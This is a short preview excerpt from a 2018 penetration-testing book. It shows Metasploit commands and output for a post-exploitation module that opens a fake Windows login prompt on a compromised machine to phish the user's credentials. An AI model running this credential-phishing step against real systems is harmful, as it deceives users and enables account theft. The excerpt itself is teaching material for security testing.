February 2018
Intermediate to advanced
426 pages
11h 3m
English
To harvest credentials, we will use the Windows Gather User Credentials post-exploitation module with which we are able to perform a phishing attack on the target by popping up a login prompt.
msf > use post/windows/gather/phish_windows_credentialsmsf post(phish_windows_credentials) > set SESSION 1SESSION => 1msf post(phish_windows_credentials) > run[+] PowerShell is installed.[*] Starting the popup script. Waiting on the user to fill in his credentials...[+] #< CLIXML
Read now
Unlock full access